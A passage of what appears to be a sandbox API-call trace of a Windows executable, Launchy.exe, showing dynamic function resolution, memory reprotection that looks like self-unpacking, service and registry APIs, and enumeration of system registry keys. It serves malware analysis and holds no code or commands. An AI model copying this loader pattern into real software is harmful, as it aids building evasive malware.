(hdc=0x1) returned 0 [0057.876] GetKeyState (nVirtKey=1) returned 0 [0057.876] GetStretchBltMode (hdc=0x1) returned 0 [0057.876] GetKeyState (nVirtKey=1) returned 0 [0057.876] GetStretchBltMode (hdc=0x1) returned 0 [0057.876] GetKeyState (nVirtKey=1) returned 0 [0057.876] GetStretchBltMode (hdc=0x1) returned 0 [0057.876] GetKeyState (nVirtKey=1) returned 0 [0057.876] GetStretchBltMode (hdc=0x1) returned 0 [0057.876] GetKeyState (nVirtKey=1) returned 0 [0057.876] GetStretchBltMode (hdc=0x1) returned 0 [0057.876] GetKeyState (nVirtKey=1) returned 0 [0057.876] GetStretchBltMode (hdc=0x1) returned 0 [0057.876] GetKeyState (nVirtKey=1) returned 0 [0057.876] GetStretchBltMode (hdc=0x1) returned 0 [0057.876] GetKeyState (nVirtKey=1) returned 0 [0057.876] GetStretchBltMode (hdc=0x1) returned 0 [0057.876] GetKeyState (nVirtKey=1) returned 0 [0057.876] GetStretchBltMode (hdc=0x1) returned 0 [0057.876] GetKeyState (nVirtKey=1) returned 0 [0057.876] GetStretchBltMode (hdc=0x1) returned 0 [0057.876] GetKeyState (nVirtKey=1) returned 0 [0057.876] GetStretchBltMode (hdc=0x1) returned 0 [0057.877] GetKeyState (nVirtKey=1) returned 0 [0057.877] GetStretchBltMode (hdc=0x1) returned 0 [0057.877] GetKeyState (nVirtKey=1) returned 0 [0057.877] GetStretchBltMode (hdc=0x1) returned 0 [0057.877] GetKeyState (nVirtKey=1) returned 0 [0057.877] GetStretchBltMode (hdc=0x1) returned 0 [0057.877] GetKeyState (nVirtKey=1) returned 0 [0057.877] GetStretchBltMode (hdc=0x1) returned 0 [0057.877] GetKeyState (nVirtKey=1) returned 0 [0057.877] GetStretchBltMode (hdc=0x1) returned 0 [0057.877] GetKeyState (nVirtKey=1) returned 0 [0057.877] GetStretchBltMode (hdc=0x1) returned 0 [0057.877] GetKeyState (nVirtKey=1) returned 0 [0057.877] GetStretchBltMode (hdc=0x1) returned 0 [0057.877] GetKeyState (nVirtKey=1) returned 0 [0057.877] GetStretchBltMode (hdc=0x1) returned 0 [0057.877] GetKeyState (nVirtKey=1) returned 0 [0057.877] GetStretchBltMode (hdc=0x1) returned 0 [0057.877] GetKeyState (nVirtKey=1) returned 0 [0057.877] GetStretchBltMode (hdc=0x1) returned 0 [0057.877] GetKeyState (nVirtKey=1) returned 0 [0057.877] GetStretchBltMode (hdc=0x1) returned 0 [0057.877] GetKeyState (nVirtKey=1) returned 0 [0057.877] GetStretchBltMode (hdc=0x1) returned 0 [0057.877] GetKeyState (nVirtKey=1) returned 0 [0057.877] GetStretchBltMode (hdc=0x1) returned 0 [0057.877] GetKeyState (nVirtKey=1) returned 0 [0057.877] GetStretchBltMode (hdc=0x1) returned 0 [0057.880] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0057.880] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0057.880] GetProcAddress (hModule=0x76d30000, lpProcName="UnmapViewOfFile") returned 0x76d41826 [0057.880] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0057.880] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExA") returned 0x76d44913 [0057.881] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0057.881] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0057.881] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0057.881] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0057.881] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0057.881] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0057.881] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathA") returned 0x76d6276c [0057.881] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0057.881] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0057.881] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0057.881] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0057.881] GetProcAddress (hModule=0x76c10000, lpProcName="VirtualAlloc") returned 0x76c1e365 [0057.881] VirtualAlloc (lpAddress=0x0, dwSize=0xe200, flAllocationType=0x3000, flProtect=0x40) returned 0x220000 [0057.883] VirtualProtect (in: lpAddress=0x400000, dwSize=0x11000, flNewProtect=0x40, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 1 [0057.887] LoadLibraryExA (lpLibFileName="ntdll.dll", hFile=0x0, dwFlags=0x0) returned 0x77c40000 [0057.887] GetProcAddress (hModule=0x77c40000, lpProcName="NtClose") returned 0x77c5f9d0 [0057.887] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateFile") returned 0x77c600a4 [0057.887] GetProcAddress (hModule=0x77c40000, lpProcName="RtlInitUnicodeString") returned 0x77c6e208 [0057.887] GetProcAddress (hModule=0x77c40000, lpProcName="NtMapViewOfSection") returned 0x77c5fc40 [0057.887] GetProcAddress (hModule=0x77c40000, lpProcName="NtFsControlFile") returned 0x77c5fde8 [0057.887] GetProcAddress (hModule=0x77c40000, lpProcName="RtlImageNtHeader") returned 0x77c73164 [0057.887] GetProcAddress (hModule=0x77c40000, lpProcName="RtlUnwind") returned 0x77c86d39 [0057.887] GetProcAddress (hModule=0x77c40000, lpProcName="_chkstk") returned 0x77c7ad68 [0057.887] GetProcAddress (hModule=0x77c40000, lpProcName="memset") returned 0x77c6df20 [0057.888] GetProcAddress (hModule=0x77c40000, lpProcName="memcpy") returned 0x77c62340 [0057.888] GetProcAddress (hModule=0x77c40000, lpProcName="RtlNtStatusToDosError") returned 0x77c761ed [0057.888] GetProcAddress (hModule=0x77c40000, lpProcName="wcschr") returned 0x77c77f1c [0057.888] GetProcAddress (hModule=0x77c40000, lpProcName="memcmp") returned 0x77c72265 [0057.888] GetProcAddress (hModule=0x77c40000, lpProcName="NtUnmapViewOfSection") returned 0x77c5fc70 [0057.888] GetProcAddress (hModule=0x77c40000, lpProcName="NtDeleteFile") returned 0x77c609d4 [0057.888] GetProcAddress (hModule=0x77c40000, lpProcName="_snprintf") returned 0x77d14760 [0057.888] GetProcAddress (hModule=0x77c40000, lpProcName="_wcslwr") returned 0x77d14b6b [0057.888] GetProcAddress (hModule=0x77c40000, lpProcName="_snwprintf") returned 0x77c72417 [0057.888] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenSection") returned 0x77c5fdb8 [0057.888] GetProcAddress (hModule=0x77c40000, lpProcName="_allmul") returned 0x77c82760 [0057.889] GetProcAddress (hModule=0x77c40000, lpProcName="_aulldiv") returned 0x77c9b140 [0057.889] GetProcAddress (hModule=0x77c40000, lpProcName="_aulldvrm") returned 0x77c6f880 [0057.889] GetProcAddress (hModule=0x77c40000, lpProcName="NtQueryVirtualMemory") returned 0x77c5fbc8 [0057.889] LoadLibraryExA (lpLibFileName="SHLWAPI.dll", hFile=0x0, dwFlags=0x0) returned 0x772f0000 [0057.889] GetProcAddress (hModule=0x772f0000, lpProcName="PathCombineW") returned 0x7730c39c [0057.889] GetProcAddress (hModule=0x772f0000, lpProcName="StrToIntExW") returned 0x77320196 [0057.889] GetProcAddress (hModule=0x772f0000, lpProcName="StrTrimW") returned 0x773031bc [0057.889] GetProcAddress (hModule=0x772f0000, lpProcName="StrRChrW") returned 0x77303ef0 [0057.890] GetProcAddress (hModule=0x772f0000, lpProcName="StrStrW") returned 0x772fe52d [0057.890] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0057.890] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0057.890] GetProcAddress (hModule=0x772f0000, lpProcName="StrCmpNW") returned 0x77305cc4 [0057.890] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0057.890] GetProcAddress (hModule=0x772f0000, lpProcName="StrChrW") returned 0x77304640 [0057.890] LoadLibraryExA (lpLibFileName="KERNEL32.dll", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0057.890] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0057.890] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0057.890] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0057.890] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0057.890] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0057.891] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0057.891] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0057.891] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0057.891] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0057.891] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0057.891] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0057.891] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0057.891] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0057.891] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0057.891] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0057.891] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0057.891] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExW") returned 0x76d5d50f [0057.891] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0057.891] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileAttributesW") returned 0x76d5d4f7 [0057.892] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0057.892] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0057.892] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0057.892] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0057.892] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0057.892] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0057.892] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0057.892] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0057.892] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventA") returned 0x76d4328c [0057.892] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0057.892] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0057.892] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0057.892] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0057.892] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0057.892] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForMultipleObjects") returned 0x76d44220 [0057.893] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0057.893] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0057.893] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0057.893] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0057.893] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0057.893] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0057.893] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0057.893] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0057.893] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0057.893] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0057.894] GetProcAddress (hModule=0x76d30000, lpProcName="ResetEvent") returned 0x76d416dd [0057.894] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedDecrement") returned 0x76d413f0 [0057.894] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0057.894] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0057.894] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentDirectoryW") returned 0x76d45611 [0057.894] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0057.894] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0057.894] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0057.894] GetProcAddress (hModule=0x76d30000, lpProcName="QueryDosDeviceW") returned 0x76d6ceec [0057.894] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0057.894] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDriveStringsW") returned 0x76dc436f [0057.895] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0057.895] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesW") returned 0x76d41b18 [0057.895] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceFrequency") returned 0x76d441f0 [0057.895] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0057.895] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileTime") returned 0x76d5ecbb [0057.895] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingW") returned 0x76d41909 [0057.895] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathW") returned 0x76d5d4dc [0057.895] GetProcAddress (hModule=0x76d30000, lpProcName="UnmapViewOfFile") returned 0x76d41826 [0057.895] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0057.895] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0057.896] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0057.896] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0057.896] GetProcAddress (hModule=0x76d30000, lpProcName="GetWindowsDirectoryW") returned 0x76d443e2 [0057.896] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0057.896] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempFileNameW") returned 0x76d6d1b6 [0057.896] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0057.896] GetProcAddress (hModule=0x77710000, lpProcName="RegisterServiceCtrlHandlerW") returned 0x7771a97d [0057.896] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0057.896] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0057.896] GetProcAddress (hModule=0x77710000, lpProcName="CryptGenRandom") returned 0x7771dfc8 [0057.897] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0057.897] GetProcAddress (hModule=0x77710000, lpProcName="GetSidSubAuthority") returned 0x77720e24 [0057.897] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0057.897] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0057.897] GetProcAddress (hModule=0x77710000, lpProcName="GetSidSubAuthorityCount") returned 0x77720e0c [0057.897] GetProcAddress (hModule=0x77710000, lpProcName="StartServiceCtrlDispatcherW") returned 0x7771a965 [0057.897] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0057.897] GetProcAddress (hModule=0x77710000, lpProcName="SetServiceStatus") returned 0x7771c7a6 [0057.897] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteValueW") returned 0x7771cf31 [0057.897] GetProcAddress (hModule=0x77710000, lpProcName="DeleteService") returned 0x7773715c [0057.898] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0057.898] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0057.898] GetProcAddress (hModule=0x77710000, lpProcName="StartServiceW") returned 0x77717974 [0057.898] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0057.898] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0057.898] GetProcAddress (hModule=0x77710000, lpProcName="CreateServiceW") returned 0x7773712c [0057.898] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0057.898] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatusEx") returned 0x7771798c [0057.898] GetProcAddress (hModule=0x77710000, lpProcName="RegEnumKeyW") returned 0x7772445b [0057.898] LoadLibraryExA (lpLibFileName="SHELL32.dll", hFile=0x0, dwFlags=0x0) returned 0x759d0000 [0057.898] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0057.899] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0059.470] GetProcAddress (hModule=0x76620000, lpProcName="CreateStreamOnHGlobal") returned 0x7664363b [0059.470] VirtualProtect (in: lpAddress=0x401000, dwSize=0x7967, flNewProtect=0x210160, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0059.497] VirtualProtect (in: lpAddress=0x409000, dwSize=0xe76, flNewProtect=0x210140, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0059.497] VirtualProtect (in: lpAddress=0x40a000, dwSize=0x658, flNewProtect=0x210148, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0059.497] VirtualProtect (in: lpAddress=0x40b000, dwSize=0x4658, flNewProtect=0x210140, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0059.498] VirtualProtect (in: lpAddress=0x410000, dwSize=0x944, flNewProtect=0x210140, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0059.499] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0059.499] GetProcessHeap () returned 0x6e0000 [0059.499] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x46c4) returned 0x6f5238 [0059.538] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff5c | out: lpSystemTimeAsFileTime=0x18ff5c*(dwLowDateTime=0x64b4f300, dwHighDateTime=0x1d64a6c)) [0059.538] QueryPerformanceFrequency (in: lpFrequency=0x18ff64 | out: lpFrequency=0x18ff64*=100000000) returned 1 [0059.538] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff54 | out: lpPerformanceCount=0x18ff54*=17982924791) returned 1 [0059.539] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9c [0059.540] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0059.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x208) returned 0x6f9908 [0059.540] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x6f9908, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Launchy.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\launchy.exe")) returned 0x31 [0059.540] StrRChrW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Launchy.exe", lpEnd=0x0, wMatch=0x5c) returned="\\Launchy.exe" [0059.540] lstrlenW (lpString="Launchy.exe") returned 11 [0059.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6f4b58 [0059.541] PathFindExtensionW (pszPath="Launchy.exe") returned=".exe" [0059.541] StrChrW (lpStart="Launchy", wMatch=0x3a) returned 0x0 [0059.541] LoadLibraryA (lpLibFileName="DBGHELP.DLL") returned 0x75590000 [0060.181] GetProcAddress (hModule=0x75590000, lpProcName="MiniDumpWriteDump") returned 0x755d5d38 [0060.181] lstrlenW (lpString="Launchy") returned 7 [0060.182] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x26 [0060.182] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x6f9b18 [0060.182] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x6f9b18, nSize=0x26 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x26 [0060.182] lstrcatW (in: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpString2="Launchy" | out: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Launchy") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Launchy" [0060.182] lstrcatW (in: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Launchy", lpString2=".dmp" | out: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Launchy.dmp") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Launchy.dmp" [0060.182] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Launchy.dmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\launchy.dmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0060.207] SetFilePointer (in: hFile=0xa0, lDistanceToMove=65536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0060.207] SetEndOfFile (hFile=0xa0) returned 1 [0060.207] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x401af6) returned 0x0 [0060.208] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control", phkResult=0x18ff88 | out: phkResult=0x18ff88*=0xa4) returned 0x0 [0060.208] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x0, lpName=0x18fd58, cchName=0x104 | out: lpName="ACPI") returned 0x0 [0060.208] lstrlenW (lpString="ACPI") returned 4 [0060.208] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x16) returned 0x6f9b88 [0060.209] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1, lpName=0x18fd58, cchName=0x104 | out: lpName="AGP") returned 0x0 [0060.209] lstrlenW (lpString="AGP") returned 3 [0060.209] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6f9ba8 [0060.209] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2, lpName=0x18fd58, cchName=0x104 | out: lpName="AppID") returned 0x0 [0060.209] lstrlenW (lpString="AppID") returned 5 [0060.209] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6f9bc8 [0060.209] lstrcmpW (lpString1="agp", lpString2="app") returned -1 [0060.244] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x12) returned 0x6f9d68 [0060.244] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3, lpName=0x18fd58, cchName=0x104 | out: lpName="Arbiters") returned 0x0 [0060.245] lstrlenW (lpString="Arbiters") returned 8 [0060.245] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1e) returned 0x6f4250 [0060.245] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4, lpName=0x18fd58, cchName=0x104 | out: lpName="BackupRestore") returned 0x0 [0060.245] lstrlenW (lpString="BackupRestore") returned 13 [0060.245] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1a) returned 0x6f4278 [0060.245] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x6f42a0 [0060.245] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x5, lpName=0x18fd58, cchName=0x104 | out: lpName="Class") returned 0x0 [0060.245] lstrlenW (lpString="Class") returned 5 [0060.245] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6f9d88 [0060.245] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x6, lpName=0x18fd58, cchName=0x104 | out: lpName="CMF") returned 0x0 [0060.245] lstrlenW (lpString="CMF") returned 3 [0060.245] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6f9da8 [0060.245] lstrcmpW (lpString1="agp", lpString2="cmf") returned -1 [0060.245] lstrcmpW (lpString1="app", lpString2="cmf") returned -1 [0060.245] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x7, lpName=0x18fd58, cchName=0x104 | out: lpName="CoDeviceInstallers") returned 0x0 [0060.245] lstrlenW (lpString="CoDeviceInstallers") returned 18 [0060.245] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x12) returned 0x6fa268 [0060.245] lstrcmpW (lpString1="id", lpString2="co") returned 1 [0060.245] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1a) returned 0x6f42c8 [0060.245] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0060.245] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x22) returned 0x6fa288 [0060.246] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x8, lpName=0x18fd58, cchName=0x104 | out: lpName="COM Name Arbiter") returned 0x0 [0060.246] lstrlenW (lpString="COM Name Arbiter") returned 16 [0060.246] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6fa2b8 [0060.246] lstrcmpW (lpString1="agp", lpString2="com") returned -1 [0060.246] lstrcmpW (lpString1="app", lpString2="com") returned -1 [0060.246] lstrcmpW (lpString1="cmf", lpString2="com") returned -1 [0060.246] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x16) returned 0x6fa2d8 [0060.246] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0060.246] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x6f42f0 [0060.246] lstrcmpW (lpString1="restore", lpString2="arbiter") returned 1 [0060.246] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x9, lpName=0x18fd58, cchName=0x104 | out: lpName="ComputerName") returned 0x0 [0060.246] lstrlenW (lpString="ComputerName") returned 12 [0060.246] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1e) returned 0x6f4318 [0060.246] lstrcmpW (lpString1="arbiters", lpString2="computer") returned -1 [0060.246] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x16) returned 0x6fa310 [0060.246] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0060.246] lstrcmpW (lpString1="name", lpString2="name") returned 0 [0060.246] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6fa310 | out: hHeap=0x6e0000) returned 1 [0060.246] RegEnumKeyW (in: hKey=0xa4, dwIndex=0xa, lpName=0x18fd58, cchName=0x104 | out: lpName="ContentIndex") returned 0x0 [0060.246] lstrlenW (lpString="ContentIndex") returned 12 [0060.246] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x6f4340 [0060.247] lstrcmpW (lpString1="restore", lpString2="content") returned 1 [0060.247] lstrcmpW (lpString1="arbiter", lpString2="content") returned -1 [0060.247] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6fa310 [0060.247] lstrcmpW (lpString1="class", lpString2="index") returned -1 [0060.247] RegEnumKeyW (in: hKey=0xa4, dwIndex=0xb, lpName=0x18fd58, cchName=0x104 | out: lpName="CrashControl") returned 0x0 [0060.247] lstrlenW (lpString="CrashControl") returned 12 [0060.247] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6fa330 [0060.247] lstrcmpW (lpString1="class", lpString2="crash") returned -1 [0060.247] lstrcmpW (lpString1="index", lpString2="crash") returned 1 [0060.247] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x6f4368 [0060.247] lstrcmpW (lpString1="restore", lpString2="control") returned 1 [0060.247] lstrcmpW (lpString1="arbiter", lpString2="control") returned -1 [0060.247] lstrcmpW (lpString1="content", lpString2="control") returned -1 [0060.247] RegEnumKeyW (in: 